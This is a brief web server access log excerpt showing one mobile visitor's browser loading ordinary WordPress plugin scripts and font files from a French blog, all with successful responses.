78.126.82.154 - - [14/Sep/2026:13:03:50 +0200] "GET /wp-content/plugins/elementor-pro/assets/js/elements-handlers.min.js?ver=4.2.1 HTTP/1.1" 200 43922 "https://lecocondalfred.fr/histoire-dune-reeducation-en-orthophonie/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36"
78.126.82.154 - - [14/Sep/2026:13:03:50 +0200] "GET /wp-content/plugins/wpfront-scroll-top/includes/assets/wpfront-scroll-top.min.js?ver=3.0.1.09211 HTTP/1.1" 200 1490 "https://lecocondalfred.fr/histoire-dune-reeducation-en-orthophonie/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36"
78.126.82.154 - - [14/Sep/2026:13:03:50 +0200] "GET /wp-content/uploads/elementor/google-fonts/fonts/roboto-kfo7cnqeu92fr1me7ksn66agldtyluama3yuba.woff2 HTTP/1.1" 200 40128 "https://lecocondalfred.fr/wp-content/uploads/elementor/google-fonts/css/roboto.css?ver=1742247286" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36"
78.126.82.154 - - [14/Sep/2026:13:03:50 +0200] "GET /wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff2?5.53.0 HTTP/1.1" 200 108000 "https://lecocondalfred.fr/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ver=5.53.0" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36"
